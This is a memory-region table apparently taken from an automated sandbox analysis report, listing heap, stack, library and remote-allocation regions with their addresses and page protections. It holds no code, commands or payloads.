|
||
|
1B045D70000
|
heap
|
page read and write
|
||
|
1B05E0C8000
|
heap
|
page read and write
|
||
|
7FF886D40000
|
trusted library allocation
|
page read and write
|
||
|
A0E000
|
stack
|
page read and write
|
||
|
4572BFE000
|
stack
|
page read and write
|
||
|
1B04433C000
|
heap
|
page read and write
|
||
|
7FF886BE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
472967E000
|
stack
|
page read and write
|
||
|
471000
|
remote allocation
|
page execute and read and write
|
||
|
7FF886BD0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886BD6000
|
trusted library allocation
|
page read and write
|
||
|
2650000
|
heap
|
page read and write
|
||
|
1B0464B3000
|
trusted library allocation
|
page read and write
|
||
|
2354B5FE000
|
heap
|
page read and write
|
||
|
235493AF000
|
heap
|
page read and write
|
||
|
2468001F000
|
trusted library allocation
|
page read and write
|
||
|
1B0464C1000
|
trusted library allocation
|
page read and write
|
||
|
7FF886EBC000
|
trusted library allocation
|
page read and write
|
||
|
7FF886CF2000
|
trusted library allocation
|
page read and write
|
||
|
279F000
|
stack
|
page read and write
|
||
|
7FF886E40000
|
trusted library allocation
|
page read and write
|
||
|
235493AF000
|
heap
|
page read and write
|
||
|
2354B38D000
|
heap
|
page read and write
|
||
|
1B05E4B7000
|
heap
|
page read and write
|
||
|
1B044375000
|
heap
|
page read and write
|
||
|
7FF886CE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B05E8A0000
|
trusted library section
|
page read and write
|
||
|
1B05E2A4000
|
heap
|
page read and write
|
||
|
24680143000
|
trusted library allocation
|
page read and write
|
||
|
7FF886C06000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886D60000
|
trusted library allocation
|
page read and write
|
||
|
2354B299000
|
heap
|
page read and write
|
||
|
2354B26B000
|
heap
|
page read and write
|
||
|
1CEFEE47000
|
heap
|
page read and write
|
||
|
7FF886DA0000
|
trusted library allocation
|
page read and write
|
||
|
1CE996C0000
|
heap
|
page read and write
|
||
|
4729D7B000
|
stack
|
page read and write
|
||
|
4729CFE000
|
stack
|
page read and write
|
||
|
2354B368000
|
heap
|
page read and write
|
||
|
246F3226000
|
heap
|
page read and write
|
||
|
7FF886BC6000
|
trusted library allocation
|
page read and write
|
||
|
1B0464A8000
|
trusted library allocation
|
page read and write
|
||
|
2354B5B8000
|
heap
|
page read and write
|
||
|
1B05E2D7000
|
heap
|
page read and write
|
||
|
45729FF000
|
stack
|
page read and write
|
||
|
9DA8D7E000
|
stack
|
page read and write
|
||
|
1CE9976A000
|
heap
|
page read and write
|
||
|
F9C3CF8000
|
stack
|
page read and write
|
||
|
23549392000
|
heap
|
page read and write
|
||
|
2354B328000
|
heap
|
page read and write
|
||
|
7FF886DE0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886CC1000
|
trusted library allocation
|
page read and write
|
||
|
2354B5A5000
|
heap
|
page read and write
|
||
|
2354B4C8000
|
heap
|
page read and write
|
||
|
1CEFEE52000
|
heap
|
page read and write
|
||
|
1B0460C1000
|
trusted library allocation
|
page read and write
|
||
|
1CEFEEC8000
|
heap
|
page read and write
|
||
|
7FF886DF0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886B3B000
|
trusted library allocation
|
page read and write
|
||
|
C10000
|
heap
|
page read and write
|
||
|
2468005E000
|
trusted library allocation
|
page read and write
|
||
|
4729BFE000
|
stack
|
page read and write
|
||
|
F9C3FBF000
|
stack
|
page read and write
|
||
|
1CEFF045000
|
heap
|
page read and write
|
||
|
1CE81470000
|
trusted library allocation
|
page read and write
|
||
|
7FF886CE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886D80000
|
trusted library allocation
|
page read and write
|
||
|
1CEFF050000
|
heap
|
page read and write
|
||
|
2354B252000
|
heap
|
page read and write
|
||
|
246F39C0000
|
heap
|
page read and write
|
||
|
47298FE000
|
stack
|
page read and write
|
||
|
C0F000
|
stack
|
page read and write
|
||
|
2354B247000
|
heap
|
page read and write
|
||
|
24680048000
|
trusted library allocation
|
page read and write
|
||
|
235493AC000
|
heap
|
page read and write
|
||
|
7FF886CC2000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E80000
|
trusted library allocation
|
page read and write
|
||
|
246F38AF000
|
heap
|
page read and write
|
||
|
246F3590000
|
trusted library allocation
|
page read and write
|
||
|
7FF886BDC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886CCA000
|
trusted library allocation
|
page read and write
|
||
|
7FF886B22000
|
trusted library allocation
|
page read and write
|
||
|
4729AF8000
|
stack
|
page read and write
|
||
|
7FF886B30000
|
trusted library allocation
|
page read and write
|
||
|
1CEFEEE2000
|
heap
|
page read and write
|
||
|
7FF886B24000
|
trusted library allocation
|
page read and write
|
||
|
7FF886B2D000
|
trusted library allocation
|
page execute and read and write
|
||
|
9DA8E79000
|
stack
|
page read and write
|
||
|
1CE915B1000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E00000
|
trusted library allocation
|
page read and write
|
||
|
246804F6000
|
trusted library allocation
|
page read and write
|
||
|
246F1992000
|
heap
|
page read and write
|
||
|
246F38B2000
|
heap
|
page read and write
|
||
|
2354B3A1000
|
heap
|
page read and write
|
||
|
2354B224000
|
heap
|
page read and write
|
||
|
246800F8000
|
trusted library allocation
|
page read and write
|
||
|
9DA907E000
|
stack
|
page read and write
|
||
|
1CEFEE7E000
|
heap
|
page read and write
|
||
|
7FF886E20000
|
trusted library allocation
|
page read and write
|
||
|
F9C403E000
|
stack
|
page read and write
|
||
|
246F1950000
|
heap
|
page read and write
|
||
|
8FB000
|
stack
|
page read and write
|
||
|
1B046516000
|
trusted library allocation
|
page read and write
|
||
|
2354B620000
|
heap
|
page read and write
|
||
|
1B0442F9000
|
heap
|
page read and write
|
||
|
2354B496000
|
heap
|
page read and write
|
||
|
1B05E55A000
|
heap
|
page read and write
|
||
|
246F3800000
|
heap
|
page read and write
|
||
|
7FF886DF0000
|
trusted library allocation
|
page read and write
|
||
|
1CE9972B000
|
heap
|
page read and write
|
||
|
23549463000
|
heap
|
page read and write
|
||
|
1B047A11000
|
trusted library allocation
|
page read and write
|
||
|
2354B33C000
|
heap
|
page read and write
|
||
|
2354B5B9000
|
heap
|
page read and write
|
||
|
24680001000
|
trusted library allocation
|
page read and write
|
||
|
9DA90FE000
|
stack
|
page read and write
|
||
|
1B05E890000
|
heap
|
page read and write
|
||
|
1B044495000
|
heap
|
page read and write
|
||
|
7FF886EC3000
|
trusted library allocation
|
page read and write
|
||
|
1B0441C0000
|
heap
|
page read and write
|
||
|
F9C375D000
|
stack
|
page read and write
|
||
|
2354B49A000
|
heap
|
page read and write
|
||
|
1B0464C5000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D30000
|
trusted library allocation
|
page read and write
|
||
|
1CE99707000
|
heap
|
page read and write
|
||
|
7FF886D20000
|
trusted library allocation
|
page read and write
|
||
|
7FF886B14000
|
trusted library allocation
|
page read and write
|
||
|
2354B6D9000
|
heap
|
page read and write
|
||
|
7FF886DD0000
|
trusted library allocation
|
page read and write
|
||
|
291E000
|
stack
|
page read and write
|
||
|
7FF886B30000
|
trusted library allocation
|
page read and write
|
||
|
1B0465DA000
|
trusted library allocation
|
page read and write
|
||
|
1B044490000
|
heap
|
page read and write
|
||
|
9DA8A72000
|
stack
|
page read and write
|
||
|
7FF886CE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886E00000
|
trusted library allocation
|
page read and write
|
||
|
246F3860000
|
heap
|
page read and write
|
||
|
7FF886D40000
|
trusted library allocation
|
page read and write
|
||
|
2468004B000
|
trusted library allocation
|
page read and write
|
||
|
2354B5FE000
|
heap
|
page read and write
|
||
|
2354B237000
|
heap
|
page read and write
|
||
|
1B0442F0000
|
heap
|
page read and write
|
||
|
2354B331000
|
heap
|
page read and write
|
||
|
1B05E2D9000
|
heap
|
page read and write
|
||
|
7FF886EA1000
|
trusted library allocation
|
page read and write
|
||
|
23549455000
|
heap
|
page read and write
|
||
|
5C0000
|
heap
|
page read and write
|
||
|
246F3200000
|
trusted library allocation
|
page read and write
|
||
|
24690001000
|
trusted library allocation
|
page read and write
|
||
|
301E000
|
stack
|
page read and write
|
||
|
2354B4B6000
|
heap
|
page read and write
|
||
|
2354B3A1000
|
heap
|
page read and write
|
||
|
7FF886CD1000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E40000
|
trusted library allocation
|
page read and write
|
||
|
235493B6000
|
heap
|
page read and write
|
||
|
C20000
|
heap
|
page read and write
|
||
|
7FF886BD6000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D90000
|
trusted library allocation
|
page read and write
|
||
|
23549466000
|
heap
|
page read and write
|
||
|
2354B5FE000
|
heap
|
page read and write
|
||
|
1B0477A8000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D90000
|
trusted library allocation
|
page read and write
|
||
|
7FF886CF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
475000
|
remote allocation
|
page execute and read and write
|
||
|
246F38CB000
|
heap
|
page read and write
|
||
|
246F39A0000
|
heap
|
page read and write
|
||
|
7FF886B13000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B0464EE000
|
trusted library allocation
|
page read and write
|
||
|
2354B4C6000
|
heap
|
page read and write
|
||
|
2A1F000
|
stack
|
page read and write
|
||
|
F9C40BB000
|
stack
|
page read and write
|
||
|
2354945E000
|
heap
|
page read and write
|
||
|
1B0464BD000
|
trusted library allocation
|
page read and write
|
||
|
9DA8F7D000
|
stack
|
page read and write
|
||
|
1B044440000
|
trusted library allocation
|
page read and write
|
||
|
246F19D6000
|
heap
|
page read and write
|
||
|
4572DFF000
|
stack
|
page read and write
|
||
|
1B0477F1000
|
trusted library allocation
|
page read and write
|
||
|
2354B28B000
|
heap
|
page read and write
|
||
|
23549725000
|
heap
|
page read and write
|
||
|
1B0462E2000
|
trusted library allocation
|
page read and write
|
||
|
4572AFD000
|
stack
|
page read and write
|
||
|
7FF886DA8000
|
trusted library allocation
|
page read and write
|
||
|
1B04434E000
|
heap
|
page read and write
|
||
|
2354B499000
|
heap
|
page read and write
|
||
|
23549463000
|
heap
|
page read and write
|
||
|
7FF886D3E000
|
trusted library allocation
|
page read and write
|
||
|
1B0477C8000
|
trusted library allocation
|
page read and write
|
||
|
1B0477BB000
|
trusted library allocation
|
page read and write
|
||
|
1B044332000
|
heap
|
page read and write
|
||
|
1CE816D0000
|
trusted library allocation
|
page read and write
|
||
|
1B047B5E000
|
trusted library allocation
|
page read and write
|
||
|
1CE81709000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D02000
|
trusted library allocation
|
page read and write
|
||
|
7FF886DD0000
|
trusted library allocation
|
page read and write
|
||
|
1B05E2F4000
|
heap
|
page read and write
|
||
|
2354B3A1000
|
heap
|
page read and write
|
||
|
F9C3B7E000
|
stack
|
page read and write
|
||
|
7FF886D20000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D40000
|
trusted library allocation
|
page read and write
|
||
|
9DA8AFE000
|
stack
|
page read and write
|
||
|
7FF886CDA000
|
trusted library allocation
|
page read and write
|
||
|
2354B621000
|
heap
|
page read and write
|
||
|
2354B5C1000
|
heap
|
page read and write
|
||
|
1CEFF040000
|
heap
|
page read and write
|
||
|
1B05E507000
|
heap
|
page read and write
|
||
|
472987E000
|
stack
|
page read and write
|
||
|
2354B5A5000
|
heap
|
page read and write
|
||
|
1B05E280000
|
heap
|
page execute and read and write
|
||
|
7FF886E10000
|
trusted library allocation
|
page read and write
|
||
|
23549720000
|
heap
|
page read and write
|
||
|
1CEFEE82000
|
heap
|
page read and write
|
||
|
2354B227000
|
heap
|
page read and write
|
||
|
1CE99827000
|
heap
|
page execute and read and write
|
||
|
2354B341000
|
heap
|
page read and write
|
||
|
7FF886BDC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B04437B000
|
heap
|
page read and write
|
||
|
7FF886BD0000
|
trusted library allocation
|
page read and write
|
||
|
269C000
|
stack
|
page read and write
|
||
|
7FF886E00000
|
trusted library allocation
|
page read and write
|
||
|
47296FF000
|
stack
|
page read and write
|
||
|
7FF886DF0000
|
trusted library allocation
|
page read and write
|
||
|
9DA8EF8000
|
stack
|
page read and write
|
||
|
246F1920000
|
heap
|
page read and write
|
||
|
7FF886EA3000
|
trusted library allocation
|
page read and write
|
||
|
7FF886DE0000
|
trusted library allocation
|
page read and write
|
||
|
1B0563BB000
|
trusted library allocation
|
page read and write
|
||
|
246805FA000
|
trusted library allocation
|
page read and write
|
||
|
F9C3D3F000
|
stack
|
page read and write
|
||
|
1B0442C0000
|
heap
|
page read and write
|
||
|
235493BF000
|
heap
|
page read and write
|
||
|
7FF886DC0000
|
trusted library allocation
|
page read and write
|
||
|
2354B496000
|
heap
|
page read and write
|
||
|
2354B520000
|
heap
|
page read and write
|
||
|
F9C3C7E000
|
stack
|
page read and write
|
||
|
9DA8DFE000
|
stack
|
page read and write
|
||
|
45728FF000
|
stack
|
page read and write
|
||
|
9DA9C4E000
|
stack
|
page read and write
|
||
|
1CE816BF000
|
trusted library allocation
|
page read and write
|
||
|
246F35B0000
|
heap
|
page execute and read and write
|
||
|
1CEFF4F0000
|
heap
|
page read and write
|
||
|
2354B49C000
|
heap
|
page read and write
|
||
|
2354B282000
|
heap
|
page read and write
|
||
|
47299F7000
|
stack
|
page read and write
|
||
|
1B047CF2000
|
trusted library allocation
|
page read and write
|
There are 556 hidden memdumps, click here to show them.